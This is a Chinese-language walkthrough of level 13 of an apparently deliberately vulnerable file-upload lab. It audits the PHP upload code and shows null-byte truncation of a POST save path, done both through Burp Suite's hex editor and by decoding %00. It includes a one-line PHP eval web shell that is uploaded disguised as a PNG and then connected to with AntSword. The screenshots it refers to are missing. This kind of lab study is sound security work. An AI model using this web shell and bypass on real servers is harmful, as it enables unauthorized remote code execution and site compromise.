第十三关

---

一、源代码分析

代码审计

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){$ext_arr = array('jpg','png','gif');$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);if(in_array($file_ext,$ext_arr)){$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;if(move_uploaded_file($temp_file,$img_path)){$is_upload = true;} else {$msg = "上传失败";}} else {$msg = "只允许上传.jpg|.png|.gif类型文件！";}
}

与上一关不同的是这里的路径是post请求，也就是%00截断不会通过url自动解码了，得我们手动解码。

 $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

二、绕过分析

1）0x00绕过

a.上传eval.png

<?php @eval($_POST['cmd']); ?>

这个是一个php代码，然后保存为png文件就行了。

b.使用burpsuite进行拦截

修改之前：

修改之后：

将可控参数那块加入eval.php空格—>选择hex模块—>找到eval.php的位置—>修改空格的十六进制为00

进入hex模块：

c.放包

上传成功：

需要注意的是：eval.php背后的一大串会被截断

d.使用中国蚁剑进行连接

连接成功。

2）%00绕过

这里就算让我们自己手动解码，快捷键ctrl+shift+u

上传eval.png，使用Burp suite进行拦截包，添加如下：

修改之前和上面的一样

修改之后：

对…/upload/eval.php%00进行手动解码，快捷键ctrl+shift+u

放包：

注意点和上面一样。

使用中国蚁剑进行连接